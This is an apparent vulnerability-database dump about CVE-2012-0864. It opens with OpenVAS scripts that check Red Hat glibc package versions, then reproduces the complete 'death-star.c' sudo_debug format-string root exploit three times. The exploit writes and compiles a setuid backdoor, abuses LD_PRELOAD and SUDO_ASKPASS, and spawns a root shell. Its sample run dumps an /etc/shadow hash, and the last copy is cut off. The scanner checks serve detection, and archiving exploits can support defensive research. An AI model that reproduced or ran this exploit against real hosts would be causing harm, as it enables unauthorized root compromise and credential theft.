WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The glibc packages provide the standard C and standard math libraries used\n by multiple programs on the system. Without these libraries, the Linux\n system cannot function correctly.\n\n An integer overflow flaw was found in the implementation of the printf\n functions family. This could allow an attacker to bypass FORTIFY_SOURCE\n protections and execute arbitrary code using a format string flaw in\n an application, even though these protections are expected to limit the\n impact of such flaws to an application abort. (CVE-2012-0864)\n\n This update also fixes the following bugs:\n\n * Previously, the dynamic loader generated an incorrect ordering for\n initialization according to the ELF specification. This could result in\n incorrect ordering of DSO constructors and destructors. With this update,\n dependency resolution has been fixed. (BZ#783999)\n\n * Previously, locking of the main malloc arena was incorrect in the retry\n path. This could result in a deadlock if an sbrk request failed. With this\n update, locking of the main arena in the retry path has been fixed. This\n issue was exposed by a bug fix provided in the RHSA-2012:0058 update.\n (BZ#795328)\n\n * Calling memcpy with overlapping arguments on certain processors would\n generate unexpected results. While such code is a clear violation of\n ANSI/ISO standards, this update restores prior memcpy behavior. 
(BZ#799259)\n\n All users of glibc are advised to upgrade to these updated packages, which\n contain patches to resolve these issues.\";\n\ntag_affected = \"glibc on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2012-March/msg00011.html\");\n script_id(870673);\n script_version(\"$Revision: 8273 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-03 07:29:19 +0100 (Wed, 03 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-09 10:45:22 +0530 (Mon, 09 Jul 2012)\");\n script_cve_id(\"CVE-2012-0864\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"RHSA\", value: \"2012:0393-01\");\n script_name(\"RedHat Update for glibc RHSA-2012:0393-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of glibc\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.12~1.47.el6_2.9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n 
exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.12~1.47.el6_2.9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo\", rpm:\"glibc-debuginfo~2.12~1.47.el6_2.9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo-common\", rpm:\"glibc-debuginfo-common~2.12~1.47.el6_2.9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.12~1.47.el6_2.9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.12~1.47.el6_2.9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.12~1.47.el6_2.9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.12~1.47.el6_2.9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:38:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0864"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2012-03-22T00:00:00", "id": "OPENVAS:1361412562310870576", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870576", "type": "openvas", "title": "RedHat Update for glibc RHSA-2012:0397-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for glibc RHSA-2012:0397-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 
Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2012-March/msg00013.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870576\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-03-22 10:42:41 +0530 (Thu, 22 Mar 2012)\");\n script_cve_id(\"CVE-2012-0864\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"RHSA\", value:\"2012:0397-01\");\n script_name(\"RedHat Update for glibc RHSA-2012:0397-01\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'glibc'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_5\");\n script_tag(name:\"affected\", 
value:\"glibc on Red Hat Enterprise Linux (v. 5 server)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"The glibc packages provide the standard C and standard math libraries used\n by multiple programs on the system. Without these libraries, the Linux\n system cannot function correctly.\n\n An integer overflow flaw was found in the implementation of the printf\n functions family. This could allow an attacker to bypass FORTIFY_SOURCE\n protections and execute arbitrary code using a format string flaw in an\n application, even though these protections are expected to limit the impact\n of such flaws to an application abort. (CVE-2012-0864)\n\n All users of glibc are advised to upgrade to these updated packages, which\n contain a patch to resolve this issue.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.5~81.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.5~81.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo\", rpm:\"glibc-debuginfo~2.5~81.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo-common\", rpm:\"glibc-debuginfo-common~2.5~81.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.5~81.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.5~81.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.5~81.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.5~81.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-02-15T19:11:18", "description": "sudo versions 1.8.0 through 1.8.3p1 sudo_debug root exploit with glibc FORTIFY_SOURCE bypass.", "edition": 2, "published": "2013-05-01T00:00:00", "type": "zdt", "title": "Sudo v1.8.0-1.8.3p1 (sudo_debug) - Root Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-0864", "CVE-2012-0809"], "modified": "2013-05-01T00:00:00", "id": "1337DAY-ID-20717", "href": "https://0day.today/exploit/description/20717", "sourceData": "#include <sys/resource.h>\r\n#include <sys/utsname.h>\r\n#include <gnu/libc-version.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <stdio.h>\r\n#include <sys/time.h>\r\n#include <sys/stat.h>\r\n#include <string.h>\r\n#include <sys/wait.h>\r\n \r\n#define OFFSET 65000\r\n#define NUM_THREADS 0\r\n \r\n/* files that we create on disk */\r\n#define BACKDOOR \"e.c\"\r\n#define BD_COMPILED \"e\"\r\n#define SUDO_ASKPASS \"e.sh\"\r\n \r\nextern char **environ;\r\nstruct utsname ver;\r\n \r\nvoid *kill_sudo();\r\nvoid *pop_shell();\r\nvoid *set_env();\r\nint is_glibc_vuln();\r\nint is_sudo_vuln();\r\nint write_backdoor();\r\n \r\n/* hardcoded path to sudo */\r\nconst char sudo[] = \"/usr/bin/sudo\\0\";\r\nchar s_version[20];\r\n \r\n/* vuln versions of sudo */\r\nchar vuln_sudo_versions[4][20] = {\r\n {\"1.8.0\"},\r\n {\"1.8.1\"},\r\n {\"1.8.2\"},\r\n {\"1.8.3\"}\r\n};\r\n \r\n/* vuln versions of glibc */\r\nchar 
vuln_glibc_versions[4][20] = {\r\n {\"2.14.90\"},\r\n};\r\n \r\nint main(int argc, char *argv[])\r\n{\r\n struct rlimit rara;\r\n int status;\r\n char ready;\r\n uname(&ver);\r\n printf(\"[+] Targeting release: %s\\n\", ver.release);\r\n if (is_glibc_vuln()){\r\n if(is_sudo_vuln()){\r\n if (write_backdoor()){\r\n printf(\"[+] Press enter when ready...\");\r\n scanf(\"%c\", &ready);\r\n }else{ exit(0); }\r\n }else{ exit(0); }\r\n }else{ exit(0); }\r\n \r\n // ulimited stack\r\n rara.rlim_max = rara.rlim_cur = -1;\r\n setrlimit(RLIMIT_STACK, &rara);\r\n \r\n pid_t pid;\r\n if((pid = fork()) < 0)\r\n {\r\n printf(\"[-] An error occurred while forking sudo\\n\");\r\n return -1;\r\n }\r\n else if(pid == 0){\r\n set_env();\r\n kill_sudo();\r\n }else{\r\n wait(&status);\r\n if (WIFEXITED(status)) {\r\n sleep(1);\r\n pop_shell();\r\n }\r\n }\r\n}\r\n \r\nint is_glibc_vuln(){\r\n int i, returnval = -1;\r\n for (i = 0; i < 4; i++){\r\n if (strcmp(gnu_get_libc_version(), vuln_glibc_versions[i]) == 0){\r\n printf(\"[+] Found vuln glibc version: %s\\n\", gnu_get_libc_version());\r\n returnval = 1;\r\n }\r\n }\r\n return returnval;\r\n};\r\n \r\nint is_sudo_vuln(){\r\n int i, returnval = -1;;\r\n FILE *fp;\r\n char path[20];\r\n char sudo_ver_cmd[50];\r\n snprintf(sudo_ver_cmd, sizeof(sudo)+3,\"%s -V\", sudo);\r\n fp = popen(sudo_ver_cmd, \"r\");\r\n \r\n if (fp == NULL) {\r\n printf(\"[-] Failed to get sudo's version\\n[-]Exiting..\" );\r\n exit(0);\r\n }\r\n fgets(path, 21, fp);\r\n memmove (s_version, path+13,5);\r\n for (i = 0; i < 4; i++){\r\n if (strcmp(s_version, vuln_sudo_versions[i]) == 0){\r\n printf(\"[+] Found a vuln sudo version: %s\\n\", s_version);\r\n returnval = 1;\r\n }\r\n }\r\n return returnval;\r\n};\r\n \r\nint write_backdoor(){\r\n int returnval = 1;\r\n char askpass[100], compile_bd[100];\r\n char bdcode[] = \"#include <stdio.h>\\r\\n\"\r\n \"#include <stdlib.h>\\r\\n\"\r\n \"int main(int argc, char **argv){\\r\\n\"\r\n \" printf(\\\"[+] Getting 
root..!\\\\n\\\");\\r\\n\"\r\n \" setresuid(0,0,0);\\r\\n\"\r\n \" printf(\\\"[+] Cleaning system.\\\\n\\\");\\r\\n\"\r\n \" remove(\\\"e\\\"); remove(\\\"e.c\\\"); remove(\\\"e.sh\\\");\\r\\n\"\r\n \" printf(\\\"[+] Launching root shell!\\\\n\\\");\\r\\n\"\r\n \" system(\\\"/bin/sh\\\");\\r\\n\"\r\n \" exit(0);\\r\\n\"\r\n \"}\\r\\n\";\r\n \r\n FILE *fp = fopen(BACKDOOR,\"wb\");\r\n if (fp == NULL) {\r\n printf(\"[-] Failed to write backdoor on the target, check your permissions\\n\" );\r\n returnval = -1;\r\n }else{\r\n printf(\"[+] Writing backdoor: %s\\n\", BACKDOOR);\r\n }\r\n \r\n fwrite(bdcode, 1, sizeof(bdcode)-1, fp); fclose(fp);\r\n memset(compile_bd, 0x00, sizeof(compile_bd));\r\n snprintf(compile_bd, sizeof(BACKDOOR)+sizeof(BD_COMPILED)+17,\"/usr/bin/gcc %s -o %s\", BACKDOOR, BD_COMPILED);\r\n printf(\"[+] Compiling backdoor: %s\\n\", BD_COMPILED);\r\n fp = popen(compile_bd, \"r\");\r\n \r\n if (fp == NULL) {\r\n printf(\"[-] Failed to compile the backdoor, check the gcc path\\n\" );\r\n returnval = -1;\r\n }\r\n \r\n fclose(fp);\r\n memset(askpass, 0x00, sizeof(askpass));\r\n snprintf(askpass, sizeof(BD_COMPILED)*2+39,\"#!/bin/sh\\nchown root:root %s\\nchmod 4777 %s\\n\", BD_COMPILED, BD_COMPILED);\r\n fp = fopen(SUDO_ASKPASS,\"w\");\r\n \r\n if (fp == NULL) {\r\n printf(\"[-] Failed to write backdoor on the target, check your permissions\\n\" );\r\n returnval = -1;\r\n }else{\r\n printf(\"[+] Writing SUDO_ASKPASS file: %s\\n\", SUDO_ASKPASS);\r\n }\r\n \r\n fwrite(askpass, 1, sizeof(askpass)-1, fp); fclose(fp);\r\n chmod(SUDO_ASKPASS, 0755);\r\n return returnval;\r\n};\r\n \r\nvoid *set_env(){\r\n int i = 0;\r\n char ld_preload_evar[OFFSET] = \"LD_PRELOAD=\";\r\n char user_details[OFFSET] = {0x1f, 0x46, 0x01, 0x40};\r\n char sudo_askpass_evar[40];\r\n for (i=0; i<(OFFSET/4); i++){\r\n memcpy(user_details+(i*4), user_details, sizeof(int));\r\n }\r\n \r\n memmove (ld_preload_evar+11, user_details , sizeof(user_details));\r\n memset(sudo_askpass_evar, 
0x00, sizeof(sudo_askpass_evar));\r\n snprintf(sudo_askpass_evar, sizeof(SUDO_ASKPASS)+13,\"SUDO_ASKPASS=%s\", SUDO_ASKPASS);\r\n \r\n // set our environment\r\n putenv(ld_preload_evar);\r\n putenv(sudo_askpass_evar);\r\n};\r\n \r\nvoid *kill_sudo(){\r\n char fmtstring[] = \"%20$08n %*482$ %*2850$ %1073741824$\";\r\n char *args[] = { fmtstring, \"-D9\", \"-A\", \"\", NULL};\r\n \r\n // trigger the vuln\r\n execve(sudo, args, environ);\r\n};\r\n \r\nvoid *pop_shell(){\r\n // set our environment\r\n unsetenv(\"LD_PRELOAD\");\r\n unsetenv(\"SUDO_ASKPASS\");\r\n char *exploit_args[] = { BD_COMPILED, NULL };\r\n execve(BD_COMPILED, exploit_args, environ);\r\n};\n\n# 0day.today [2018-02-15] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/20717"}], "seebug": [{"lastseen": "2017-11-19T16:43:33", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "sudo 1.8.0-1.8.3p1 (sudo_debug) - Root Exploit + glibc FORTIFY_SOURCE Bypass", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-0809", "CVE-2012-0864"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-78801", "id": "SSV:78801", "sourceData": "\n /*\r\n death-star.c\r\n sudo v1.8.0-1.8.3p1 (sudo_debug) format string root exploit + glibc FORTIFY_SOURCE bypass\r\n by aeon - http://infosecabsurdity.wordpress.com/\r\n\r\n This PoC exploits:\r\n - CVE-2012-0864 - FORTIFY_SOURCE format string protection bypass via "nargs" integer overflow\r\n - CVE-2012-0809 - sudo v1.8.0-1.8.3p1 "sudo_debug" format string\r\n \r\n Tested on:\r\n - Fedora core 16 verne\r\n - glibc 2.14.90.14 release\r\n - sudo 1.8.1p2\r\n \r\n Notes:\r\n - This exploit actually turned out very reliable :-) \r\n - You can make a cleaner version of this exploit if you smash sudo_debug function pointer\r\n or a libc function pointer so you dont write to disk. 
I wont be releasing that version :-)\r\n\r\n References and thanks too:\r\n - http://seclists.org/fulldisclosure/2012/Jan/att-590/advisory_sudo.txt\r\n - http://www.vnsecurity.net/2012/02/exploiting-sudo-format-string-vunerability/\r\n - http://www.alertlogic.com/modern-userland-linux-exploitation-courseware/\r\n - "A Eulogy for Format Strings" http://www.phrack.org/issues.html?issue=67&id=9&mode=txt\r\n\r\n[aeon@localhost tmp]$ gcc death-star.c -o death-star\r\n[aeon@localhost tmp]$ ./death-star \r\n[+] Targeting release: 3.1.0-7.fc16.i686.PAE\r\n[+] Found vuln glibc version: 2.14.90\r\n[+] Found a vuln sudo version: 1.8.1\r\n[+] Writing backdoor: e.c\r\n[+] Compiling backdoor: e\r\n[+] Writing SUDO_ASKPASS file: e.sh\r\n[+] Press enter when ready...\r\n\r\n< -------------- REMOVED -------------->\r\n\r\n A?AF@F@F@F@F@' from LD_PRELOAD cannot be preloaded: ignored.\r\n %1073825311%21372736 %: settings: \r\n=\r\n %1073825311%21372736 %: settings: \r\n=\r\n %1073825311%21372736 %: sudo_mode 1081383169\r\nSorry, try again.\r\nSorry, try again.\r\nSorry, try again.\r\n%20$08n %*482$ %*2850$ %1073741824$: 3 incorrect password attempts\r\n %1073886251%21372736 %: policy plugin returns 1081402445\r\n[+] Getting root..!\r\n[+] Cleaning system.\r\n[+] Launching root shell!\r\nsh-4.2# id; uname -a\r\nuid=0(root) gid=1001(aeon) groups=0(root),1001(aeon) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023\r\nLinux localhost.localdomain 3.1.0-7.fc16.i686.PAE #1 SMP Tue Nov 1 20:53:45 UTC 2011 i686 i686 i386 GNU/Linux\r\nsh-4.2# head -n1 /etc/shadow\r\nroot:$6$YxDB.SNvtnqhtt.T$slIOJSl7Lz07PtDF23m1G0evZH4MXvpo1VNebUUasM/je2sP6FXi2Y/QE1Ntg.93jOtTQOfZ8k2e/HhT8XzXN/:15818:0:99999:7:::\r\nsh-4.2#\r\n*/\r\n\r\n#include <sys/resource.h>\r\n#include <sys/utsname.h>\r\n#include <gnu/libc-version.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <stdio.h>\r\n#include <sys/time.h>\r\n#include <sys/stat.h>\r\n#include <string.h>\r\n#include <sys/wait.h>\r\n\r\n#define 
OFFSET 65000\r\n#define NUM_THREADS 0\r\n\r\n/* files that we create on disk */\r\n#define BACKDOOR "e.c"\r\n#define BD_COMPILED "e"\r\n#define SUDO_ASKPASS "e.sh"\r\n\r\nextern char **environ;\r\nstruct utsname ver;\r\n\r\nvoid *kill_sudo();\r\nvoid *pop_shell();\r\nvoid *set_env();\r\nint is_glibc_vuln();\r\nint is_sudo_vuln();\r\nint write_backdoor();\r\n\r\n/* hardcoded path to sudo */\r\nconst char sudo[] = "/usr/bin/sudo\\0";\r\nchar s_version[20];\r\n\r\n/* vuln versions of sudo */\r\nchar vuln_sudo_versions[4][20] = {\r\n {"1.8.0"},\r\n {"1.8.1"},\r\n {"1.8.2"},\r\n {"1.8.3"}\r\n};\r\n\r\n/* vuln versions of glibc */\r\nchar vuln_glibc_versions[4][20] = {\r\n {"2.14.90"},\r\n};\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n struct rlimit rara;\r\n int status;\r\n char ready;\r\n uname(&ver);\r\n printf("[+] Targeting release: %s\\n", ver.release);\r\n if (is_glibc_vuln()){\r\n if(is_sudo_vuln()){\r\n if (write_backdoor()){\r\n printf("[+] Press enter when ready...");\r\n scanf("%c", &ready);\r\n }else{ exit(0); }\r\n }else{ exit(0); }\r\n }else{ exit(0); }\r\n\r\n // ulimited stack\r\n rara.rlim_max = rara.rlim_cur = -1;\r\n setrlimit(RLIMIT_STACK, &rara);\r\n\r\n pid_t pid;\r\n if((pid = fork()) < 0)\r\n {\r\n printf("[-] An error occurred while forking sudo\\n");\r\n return -1;\r\n }\r\n else if(pid == 0){\r\n set_env();\r\n kill_sudo();\r\n }else{\r\n wait(&status);\r\n if (WIFEXITED(status)) {\r\n sleep(1);\r\n pop_shell();\r\n }\r\n }\r\n}\r\n\r\nint is_glibc_vuln(){\r\n int i, returnval = -1;\r\n for (i = 0; i < 4; i++){\r\n if (strcmp(gnu_get_libc_version(), vuln_glibc_versions[i]) == 0){\r\n printf("[+] Found vuln glibc version: %s\\n", gnu_get_libc_version());\r\n returnval = 1;\r\n }\r\n }\r\n return returnval;\r\n};\r\n\r\nint is_sudo_vuln(){\r\n int i, returnval = -1;;\r\n FILE *fp;\r\n char path[20];\r\n char sudo_ver_cmd[50];\r\n snprintf(sudo_ver_cmd, sizeof(sudo)+3,"%s -V", sudo);\r\n fp = popen(sudo_ver_cmd, "r");\r\n\r\n if (fp == NULL) 
{\r\n printf("[-] Failed to get sudo's version\\n[-]Exiting.." );\r\n exit(0);\r\n }\r\n fgets(path, 21, fp);\r\n memmove (s_version, path+13,5);\r\n for (i = 0; i < 4; i++){\r\n if (strcmp(s_version, vuln_sudo_versions[i]) == 0){\r\n printf("[+] Found a vuln sudo version: %s\\n", s_version);\r\n returnval = 1;\r\n }\r\n }\r\n return returnval;\r\n};\r\n\r\nint write_backdoor(){\r\n int returnval = 1;\r\n char askpass[100], compile_bd[100];\r\n char bdcode[] = "#include <stdio.h>\\r\\n"\r\n "#include <stdlib.h>\\r\\n"\r\n "int main(int argc, char **argv){\\r\\n"\r\n " printf(\\"[+] Getting root..!\\\\n\\");\\r\\n"\r\n " setresuid(0,0,0);\\r\\n"\r\n " printf(\\"[+] Cleaning system.\\\\n\\");\\r\\n"\r\n " remove(\\"e\\"); remove(\\"e.c\\"); remove(\\"e.sh\\");\\r\\n"\r\n " printf(\\"[+] Launching root shell!\\\\n\\");\\r\\n"\r\n " system(\\"/bin/sh\\");\\r\\n"\r\n " exit(0);\\r\\n"\r\n "}\\r\\n";\r\n\r\n FILE *fp = fopen(BACKDOOR,"wb");\r\n if (fp == NULL) {\r\n printf("[-] Failed to write backdoor on the target, check your permissions\\n" );\r\n returnval = -1;\r\n }else{\r\n printf("[+] Writing backdoor: %s\\n", BACKDOOR);\r\n }\r\n\r\n fwrite(bdcode, 1, sizeof(bdcode)-1, fp); fclose(fp);\r\n memset(compile_bd, 0x00, sizeof(compile_bd));\r\n snprintf(compile_bd, sizeof(BACKDOOR)+sizeof(BD_COMPILED)+17,"/usr/bin/gcc %s -o %s", BACKDOOR, BD_COMPILED);\r\n printf("[+] Compiling backdoor: %s\\n", BD_COMPILED);\r\n fp = popen(compile_bd, "r");\r\n\r\n if (fp == NULL) {\r\n printf("[-] Failed to compile the backdoor, check the gcc path\\n" );\r\n returnval = -1;\r\n }\r\n\r\n fclose(fp);\r\n memset(askpass, 0x00, sizeof(askpass));\r\n snprintf(askpass, sizeof(BD_COMPILED)*2+39,"#!/bin/sh\\nchown root:root %s\\nchmod 4777 %s\\n", BD_COMPILED, BD_COMPILED);\r\n fp = fopen(SUDO_ASKPASS,"w");\r\n\r\n if (fp == NULL) {\r\n printf("[-] Failed to write backdoor on the target, check your permissions\\n" );\r\n returnval = -1;\r\n }else{\r\n printf("[+] Writing SUDO_ASKPASS file: 
%s\\n", SUDO_ASKPASS);\r\n }\r\n\r\n fwrite(askpass, 1, sizeof(askpass)-1, fp); fclose(fp);\r\n chmod(SUDO_ASKPASS, 0755);\r\n return returnval;\r\n};\r\n\r\nvoid *set_env(){\r\n int i = 0;\r\n char ld_preload_evar[OFFSET] = "LD_PRELOAD=";\r\n char user_details[OFFSET] = {0x1f, 0x46, 0x01, 0x40};\r\n char sudo_askpass_evar[40];\r\n for (i=0; i<(OFFSET/4); i++){\r\n memcpy(user_details+(i*4), user_details, sizeof(int));\r\n }\r\n\r\n memmove (ld_preload_evar+11, user_details , sizeof(user_details));\r\n memset(sudo_askpass_evar, 0x00, sizeof(sudo_askpass_evar));\r\n snprintf(sudo_askpass_evar, sizeof(SUDO_ASKPASS)+13,"SUDO_ASKPASS=%s", SUDO_ASKPASS);\r\n\r\n // set our environment\r\n putenv(ld_preload_evar);\r\n putenv(sudo_askpass_evar);\r\n};\r\n\r\nvoid *kill_sudo(){\r\n char fmtstring[] = "%20$08n %*482$ %*2850$ %1073741824$";\r\n char *args[] = { fmtstring, "-D9", "-A", "", NULL};\r\n\r\n // trigger the vuln\r\n execve(sudo, args, environ);\r\n};\r\n\r\nvoid *pop_shell(){\r\n // set our environment\r\n unsetenv("LD_PRELOAD");\r\n unsetenv("SUDO_ASKPASS");\r\n char *exploit_args[] = { BD_COMPILED, NULL };\r\n execve(BD_COMPILED, exploit_args, environ);\r\n};\r\n\n ", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-78801"}], "exploitpack": [{"lastseen": "2020-04-01T19:06:08", "description": "\nsudo 1.8.0 1.8.3p1 - sudo_debug glibc FORTIFY_SOURCE Bypass + Privilege Escalation", "edition": 1, "published": "2013-05-01T00:00:00", "title": "sudo 1.8.0 1.8.3p1 - sudo_debug glibc FORTIFY_SOURCE Bypass + Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-0864", "CVE-2012-0809"], "modified": "2013-05-01T00:00:00", "id": "EXPLOITPACK:D0C0ABEBB66F120575911D213A03B73B", "href": "", "sourceData": "/*\n death-star.c\n sudo v1.8.0-1.8.3p1 (sudo_debug) format string root exploit + glibc FORTIFY_SOURCE bypass\n by aeon - 
http://infosecabsurdity.wordpress.com/\n\n This PoC exploits:\n - CVE-2012-0864 - FORTIFY_SOURCE format string protection bypass via \"nargs\" integer overflow\n - CVE-2012-0809 - sudo v1.8.0-1.8.3p1 \"sudo_debug\" format string\n \n Tested on:\n - Fedora core 16 verne\n - glibc 2.14.90.14 release\n - sudo 1.8.1p2\n \n Notes:\n - This exploit actually turned out very reliable :-) \n - You can make a cleaner version of this exploit if you smash sudo_debug function pointer\n or a libc function pointer so you dont write to disk. I wont be releasing that version :-)\n\n References and thanks too:\n - http://seclists.org/fulldisclosure/2012/Jan/att-590/advisory_sudo.txt\n - http://www.vnsecurity.net/2012/02/exploiting-sudo-format-string-vunerability/\n - http://www.alertlogic.com/modern-userland-linux-exploitation-courseware/\n - \"A Eulogy for Format Strings\" http://www.phrack.org/issues.html?issue=67&id=9&mode=txt\n\n[aeon@localhost tmp]$ gcc death-star.c -o death-star\n[aeon@localhost tmp]$ ./death-star \n[+] Targeting release: 3.1.0-7.fc16.i686.PAE\n[+] Found vuln glibc version: 2.14.90\n[+] Found a vuln sudo version: 1.8.1\n[+] Writing backdoor: e.c\n[+] Compiling backdoor: e\n[+] Writing SUDO_ASKPASS file: e.sh\n[+] Press enter when ready...\n\n< -------------- REMOVED -------------->\n\n 